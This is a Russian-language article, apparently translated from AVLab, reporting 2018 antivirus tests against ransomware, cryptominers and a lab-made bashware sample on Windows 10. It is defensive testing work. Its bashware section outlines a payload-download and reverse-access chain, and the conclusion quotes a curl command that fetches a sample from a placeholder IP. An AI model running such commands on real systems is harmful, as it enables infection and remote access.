Лучшие антивирусы 2018 по версии AVLab

2018-06-20 | Автор | комментарии
Лаборатория AVLab определила лучшие антивирусы, проведя в 2018 году три тестирования на платформе Windows 10, в которых были проверены возможности антивирусов защищать от шифровальщиков, криптомайнеров и bashware

Лучшие антивирусы 2018 по версии AVLab

Checklab - новый бренд польской лаборатории AVLab, который представляет собой ресурс, объединяющий детализированные результаты тестов. Checklab непосредственно связан с серией испытаний, которые происходили в период с 7 по 22 мая 2018 года. Команда лаборатории на протяжении 15 месяцев занималась разработкой алгоритмов полностью автоматизированного тестирования с участием вредоносных образцов, обнаруженных в реальных условиях с помощью систем honeypot - специальных ловушек для хакеров.

В основе проекта лежит дистрибутив Ubuntu 16.04 LTS, а сама система тестирования называется PERUN и содержит модули для анализа образцов, обработки и парсинга собранных журналов и автоматизированного управления системами Windows 10. Система PERUN построена за счет комбинации языков программирования NodeJS и Python. Данное решение позволит делегировать самую трудоемкую работу машинам с высокой вычислительной мощностью. Эксперты лаборатории смогут заняться представлением результатов антивирусной защиты с позиций 2-ух областей: защита против реальных угроз в сети и противостояние современных методам обхода защиты.

Программирование внутренней части проекта Checklab (бэкенд) было завершено в апреле, и уже в мае были проведены первые публичные тесты с помощью системы PERUN. Самая трудоемкая работа выполнялась с 7 по 22 мая с помощью запрограммированных алгоритмов, которые автоматизируют управление системами Windows 10 и действиями, необходимыми для проверки вредного влияния вредоносных образцов и оценки эффективности антивирусной защиты.

Подробная информация о PERUN станет доступна в день запуска Checklab. В данном отчете эксперты лаборатории сосредоточили свое внимание на информации, которая непосредственно касается трех отдельных антивирусных тестов.

Содержание

Тестируемые антивирусы

Вредоносные образцы

Статистическая информация об атаках и угрозах в Польше была предоставлена компанией Check Point.

Шифровальщики

В апреле и июне 2017 года, шифровальщики WannaCry и NotPetya атаковали тысячи компаний различных сфер деятельности по всему миру. Атаки нанесли колоссальный ущерб, который оценивается в 4 миллиарда долларов. Такие астрономические суммы, полученные от незаконной деятельности, подтверждают прибыльность криминального бизнеса и нет никаких признаков, что данная тенденция будет сломлена в будущем.

Шифровальщики

Статистические данные компании Check Point показывают, что шифровальщики гораздо чаще атаковали компании из Польши, чем из других стран, хотя в первые месяцы 2018 года можно наблюдать тенденцию к снижению. Данный тип вредоносных программ по-прежнему очень распространен, поэтому разработчики SaaS (Security as Service) решений, сетевого оборудования и антивирусного ПО должны предоставлять более качественные продукты для блокировки современных векторов атак.

Криптомайнеры

В период с июля по декабрь 2017 года каждая пятая организация подверглась нападению с помощью вредоносных криптомайнеров. Данный вид угроз позволяет киберпреступникам использовать вычислительную мощность процессора (CPU) или графического процессора (GPU) и существующих ресурсов компьютера жертвы, чтобы добывать криптовалюты. Данные Check Point временно указывают на уменьшение количества данных вредоносных скриптов. Однако, это не означает, что майнеры криптовалюты полностью исчезли и не представляют опасности.

Криптомайнеры

Растущий интерес к цифровым валютам замедляет процесс майнинга, поскольку скорость прохождения последующих математических вычислений напрямую зависит от количества майнеров. Это побудило киберпреступников придумать способы использования вычислительных ресурсов ничего не подозревающих пользователей для добычи виртуальных валют с помощью технологии блокчейн.

В Польше самая высокая активность вредоносных криптомайнеров была зафиксирована в период с января по апрель 2018 года. Почти все коммерческие и бесплатные операционные системы не защищены от этого типа вредоносного программного обеспечения. Киберпреступники используют различные приемы для инъекции вредоносных сценариев в системы Windows и серверы на Linux. Среди последних громких событий

  • Два приложения в магазине Ubuntu Snap.
  • Уязвимость систем управления сайтами Drupal, которая привела к созданию эксплойтов, готовых к импорту в Metasploit, которые могут заражать веб-сайты вредоносными сценариями.
  • Создание вредоносного приложения, использующего вычислительную мощность в системах iOS и Android для добычи криптовалют.

Bashware

Этот тип вредоносного ПО, обнаруженный и представленный экспертами Check Point, официально не был идентифицирован при атаках на организации или пользователей. Данный метод, который использует функцию WSL (подсистема Windows для Linux), позволяющую запускать исполняемые файлы системы Linux, может потенциально угрожать сотням миллионов устройств с установленной Windows 10 на компьютере. Функция WSL делает популярный терминал bash доступным для пользователей Windows 10. Действия вредоносных программ в гибридной среде могут открыть новую дверь для преступников. По мнению многих экспертов, угроза bashware должна стать серьезным предупреждением, поскольку она открывает новые возможности для обхода безопасности сторонних разработчиков и программного обеспечения защиты Microsoft. Могут ли антивирусы обнаружить вредоносные сценарии, запущенные в гибридной среде? Оказывается, да, потому что вектор атаки начинается с приложения “bash.exe”, которое при запуске открывает консоль, запускающую оболочку Bash в Windows 10.

Происхождение угроз

Идеальным источником образцов может считаться тот источник, который предоставляет новые и различные типы вредоносного программного обеспечения. В этом случае возраст собранных образцов очень важен, поскольку он влияет на реальную защиту от угроз, которые можно найти в реальных условиях.

Происхождение угроз

Образцы, используемые в этом тесте, исходят от атак на нашу сеть систем-ловушек, которые являются очень важным инструментом для экспертов по безопасности. Цель ловушек honeypot, сценариев kiddie или других скриптов - притворяться “жертвой” (с точки зрения систем, служб или протоколов) и сохранять журналы атак. В настоящее в AVLab используются ловушки, которые эмулируют такие сервисы, как SSH, HTTP, HTTPS, SMB, FTP, TFTP и др.

Ловушки для сбора угроз располагаются в следующих странах: Канада, США, Бразилия, Великобритания, Нидерланды, Франция, Италия, Чехия, Польша, Россия, Индия, Сингапур, Япония, Австралия, Южная Африка.

Происхождение угроз

Для тестирования использовалось 43 уникальных образца шифровальщика, 35 криптомайнеров и 1 образец bashware-угрозы. Образец bashware был создан экспертами лаборатории: в системе Windows 10, была активирована среда WSL c Ubuntu (этот процесс также можно автоматизировать с помощью команд в Powershell). Угроза bashware выполняла следующую логику:

  • Запускала bash.exe и загружала файл, содержащий команду полезной нагрузки с управляемого веб-сервера с использованием библиотеки сетевого программирования /bin/bash/curl.
  • После загрузки полезной нагрузки угроза была преобразована в ее исходную форму и автоматически запущена.
  • Если вирус был успешно запущен, он открывал возможность доступа к зараженной машине (обратный HTTP).

Задача тестируемого программного обеспечения заключалась в блокировке и удалении угрозы на одном из описанных этапов.

Методология тестирования

Тест, который воспроизводит реальное поведение пользователя и вредоносного ПО является самым достоверным, но до того момента, как образец будет помещен в тестовую систему, он должен быть тщательно проанализирован. Команда лаборатории должны быть полностью уверена, что образец действительно представляет опасность - только в этом случае он будет допущен к тестированию. Случаи, когда вредоносный образец не работал в системе, потому что он был запрограммирован для другого региона, никогда не происходили в испытаниях AVLab. Читатели могут быть уверены, что все тестовые образцы представляют опасность независимо от того, к какой части мира они были получены.

Методология тестирования

Прежде чем потенциально опасный образец отбирается для тестирования, один из компонентов тестовой системы PERUN проверяет, что угроза действительно выполняет нежелательные изменения в Windows 10. Для проверки поведения зловреда отводится 15 минут. Исключение человеческого фактора не позволяет выяснить, когда была завершена вредоносная активность. Экспертам лаборатории нужно установить определенный порог времени, после которого анализ прекращается. Известно, что существует вредоносное ПО, которое может задерживать запуск на срок до нескольких десятков часов. Кроме того, угроза может ожидать инструкций от командного сервера, прослушивая определенный порт. Также в практике были случаи, когда вредоносное ПО было запрограммировано на заражение определенного приложения или дожидалось открытия веб-сайта. По этой причине были приложены все усилия для того, чтобы тесты были максимально приближены к реальности, поэтому образцы, которые являются “неопределенными”, никогда не будут включены в вирусную коллекцию для данных тестов.

После анализа вредоносного приложения, журнал его активности экспортируется во внутреннюю часть тестовой системы PERUN. На основе собранной информации алгоритмы решают, является ли конкретный образец вредоносным. Если вредоносная природа подтверждается, он сразу же передается всем тестовым системам по протоколу HTTP.

Результаты блокировки отдельных образцов угроз были разделены на три уровня:

  • Ранний уровень: вирус был заблокирован в браузере или после загрузки в операционную систему и сохранения в папке назначения c:\download или во время попытки копирования из c:\download в c:\destination.
  • Средний уровень: вирус был помещен в карантин после сохранения в папке назначения c:\destination или во время попытки запуска.
  • Низкий уровень: вирус был заблокирован после запуска и не успел заразить систему.

Результаты тестирования

Защита от шифровальщиков

Защита от шифровальщиков

Почти все участники тестирования гарантируют надежную защиту от шифрования файлов высокого уровня. Хотя в тесте использовались антивирусы со стандартными настройками, важно, чтобы каждый пользователь помнил об увеличении эффективности эвристики и усилении антивирусных защит путем активации отключенных по умолчанию компонентов защиты. Не все угрозы передаются по протоколу HTTP. Некоторые вирусы отправляются на компьютеры через почтовый клиент, используя протокол IMAP. Различия между обнаружением угроз в различных протоколах могут быть значительными.

Защита от криптомайнеров

Защита от криптомайнеров

Менее половины протестированных программ безопасности остановили все образцы криптомайнера. Самый слабый результат был показан Защитником Windows. Программное обеспечение Microsoft не имеет такой большой базы данных угроз, как конкурентные продукты. Даже половина протестированных решений не может в каждом случае корректно обработать информацию о приложении-майнере (например, xmrig), загрузке одного и тот же файла с помощью вируса-загрузчика и запуске вредоносного ПО внутри PowerShell.

Защита от bashware

Защита от bashware

Только антивирус Panda Dome не смог обнаружить угрозу. Тестовый образец получил удаленный доступ к системе после заражения машины, и в этом случае результат был отрицательным. Остальные продукты смогли заблокировать попытку заражения, начиная с приложения “bash.exe”. Решения безопасности SecureAPlus и VoodooShield Pro, которые управляют сценариями запуска, лучше всего справляются с командами, запущенными в терминале. Для защиты от сложных угроз пользователям рекомендуется выбирать антивирусное ПО с брандмауэром, расширенным контролем угроз или защитой на основе белых списков файлов и проверкой выполняемых сценариев в системных интерпретаторах Windows.

Заключение

Защита от шифровальщиков практически во всех тестируемых решениях находится на удовлетворительном уровне. Антивирусное программное обеспечение, которое может остановить 100% угроз определенного отрезка времени, не существует. Разумно использовать дополнительные механизмы или модули антивирусной защиты, которые позволяют восстанавливать файлы после процесса шифрования. Как правило, эти модули являются неотъемлемой частью надежного программного обеспечения безопасности. Даже Защитник Windows поставляется с таким модулем. В случае шифрования файлов, по крайней мере, данные в защищенных папках не будут потеряны безвозвратно. Чем больше антивирусных программ имеет компоненты, которые контролируют безопасность рабочей среды пользователя, тем лучше. Не стоит полагаться только на антивирусную систему. Некоторое программное обеспечение испытывает трудности с обнаружением безопасных приложений для шифрования файлов. Проблема в том, что такие приложения могут устанавливаться в системе Windows нежелательным образом, по инициативе трояна или вредоносного загрузчика.

Бесплатный антивирус Panda Dome не смог заблокировать угрозу bashware. Стоит добавить, что для выполнения любой команды на терминале Bash вредоносное ПО должно запускать приложение “bash.exe”. Запущенный процесс с дополнительными параметрами может быть проверен и заблокирован любым антивирусным программным обеспечением. То же самое относится к брандмауэру, который должен обнаружить и заблокировать попытку доступа к сети. Системы IPS и IDS также могут идентифицировать потенциальную атаку и реагировать в нужное время. Команды запуска, такие как curl -c hxxp://IP/sample --output /path_to_download –silent, представляют собой интересный способ обхода безопасности Windows 10, но первоначально все же требуется запустить оболочку Bash.

Результаты данных трех тестов иллюстрируют интересную ситуацию - различное антивирусное ПО, использующее движок одной и той же компании, предлагает различные, индивидуально реализованные механизмы и объемы защиты системы. Например, программное обеспечение Acrabit, G Data и F-Secure с движком Bitdefender или ZoneAlarm не может быть сопоставлено с программным обеспечением поставщика движка. Это происходит потому, что каждый разработчик реализует свои собственные механизмы, которые управляют поведением системы в разных областях (защита браузера, обработка электронной почты, анализ сетевого трафика, управление файловой системой и т. д.). Сторонний движок используется (в отдельных случаях параллельно с движком от оригинального разработчика) только как механизм для анализа конкретных объектов, которые потенциально могут иметь угрозы. Эта зависимость может быть по аналогии сравнена, например с автомобильной сферой, когда производители различных марок устанавливают двигатели конкурирующих компаний в рамках своих индивидуальных технологических соглашений.

Часто задаваемые вопросы

Когда проводились испытания?

Испытания проводились в период с 7 по 22 мая 2018 года.

Имели ли протестированные программы безопасности доступ к Интернету?

Конечно, связь к Интернету была установлена.

Как вы выбирали продукты для тестов?

Мы руководствовались популярностью продуктов. К сожалению, мы ограничены производительностью сервера, который применяется в качестве платформы для тестов. Если спрос на тесты увеличится, мы обязательно сможем тестировать больше продуктов.

Как присоединиться к вашим испытаниям?

Если вы являетесь производителем, дистрибьютором или разработчиком, и вы хотели бы присоединиться к нашим тестам, просто свяжитесь с нами. В ответ мы попросим вас дать указания относительно правильной работы вашего продукта. Мы также организуем другие детали, необходимые для разработки процедуры автоматического обнаружения вредоносных программ.

Можно ли присоединиться к испытаниям неофициально?

Да. Если вы считаете, что ваше решение не полностью развито или вы боитесь получить низкую оценку, вы можете присоединиться к тесту на испытательный период. Результаты защиты не будут доступны для общественности. Кроме того, мы предоставим вам необходимые данные, чтобы повысить эффективность защиты вашего продукта.

Являются ли тесты бесплатными?

Неверно считать, что финансирование подготовки и публикации тестов является синонимом манипулирования результатами. После того, как лаборатория будет уличена в мошенничестве, организация больше никогда не сможет восстановить свою позицию и авторитет. Очень небольшая сборная плата рассматривается обеими сторонами в качестве вознаграждения за работу и повышения безопасности пользователей. Без финансовой помощи поддержание инфраструктуры, постоянное совершенствование процедур и необходимых инструментов для проведения тестов, было бы невозможным. В свою очередь, мы предлагаем доступ к подробной информации и образцам, используемым в тесте для каждого вендора. Тесты проводятся под брендом AVLab, который существует уже 5 лет.

Какая информация является общедоступной?

Не все данные тестирования доступны общественности. Разработчики имеют доступ к более подробным данным. Остальная информация, необходимая для визуализации результатов, остается доступной для любого читателя.

Вы проводите другие тесты?

Да, но у нас нет графика тестирования. В крупных сравнительных тестах мы фокусируемся на проверке защиты от сложных кибератак. Подготовка подобных тестов, сотрудничество с разработчиками для повышения безопасности и подготовки окончательного отчета занимает гораздо больше времени, чем автоматическая проверка защиты на основе образцов вредоносных программ.

Выполняете ли вы тесты и готовите обзоры по просьбе разработчика или дистрибьютора?

Конечно, мы можем подготовить подробные обзоры, которые будут опубликованы на AVLab и CheckLab. Заинтересованным разработчикам программного обеспечения и оборудования рекомендуется связаться с нами.

Вы делитесь образцами вредоносного ПО?

Да. Если вы хотите получить доступ к вирусной базе данных, свяжитесь с нами. Эта услуга оплачивается. Надежность наших тестов всегда находится в приоритете, поэтому база данных, к которой у вас есть доступ, уже будет проверена антивирусным программным обеспечением.

В какой среде вы проводите тесты?

Тесты выполняются на виртуальных машинах. Виртуализация все чаще выполняется в рабочих средах VDI (Virtual Desktop Infrastructure). Мы используем сценарии, которые еще усиливают безопасность системы, что затрудняет обнаружение процессов виртуализации вредоносным ПО. Мы понимаем, что некоторые черви могут обнаружить запуск в виртуальной системе, поэтому мы учитываем только те образцы, которые были тщательно проверены ранее. Мы не включаем вредоносное программное обеспечение, способное обнаруживать хорошо скрытую виртуализацию. Это не идеальное решение, но мы делаем все возможное, чтобы профессионально подойти к испытаниям и согласовать эти аспекты.

Как вы понимаете, что образец вируса действительно вреден?

На основе подробных лог-файлов (журналов). Мы разработали более 100 индикаторов, которые могут указывать на то, что любые вредоносные изменения заражают систему. Чем больше таких индикаторов находится в журналах, тем больше вероятность того, что конкретный образец является вредоносным.

На основании каких данных вы решаете, заблокировал ли продукт угрозу?

Основываясь на собранных данных, разработанные алгоритмы определяют, представляет ли конкретный объект опасность, или он был заблокирован установленным продуктом безопасности. Мы с уверенностью можем определить, заблокировала ли программа безопасности вредоносное ПО с использованием сигнатурных или проактивных компонентов защиты. Анализ журналов очень трудоемок, поэтому мы разработали алгоритмы, которые автоматизируют этот процесс.

Каковы ваши планы на будущее?

Мы хотим предоставить пользователям онлайн-платформу для обмена информацией об угрозах. Систематическое совершенствование уже разработанных инструментов и методологии является естественным процессом, поэтому мы работаем над реализацией нового протокола, предоставляющего машинам образцы вредоносного ПО и над добавлением в сеть других видов ловушек.

Могу ли я использовать тесты, опубликованные в AVLab?

Конечно. Пожалуйста, внесите вклад в нашу работу по повышению безопасности и и укажите ссылку на источник.

По материалам AVLab

Нашли опечатку? Нажмите Ctrl+Enter

Комментарии и отзывы

Добавляя комментарий, ознакомьтесь с Правилами сообщества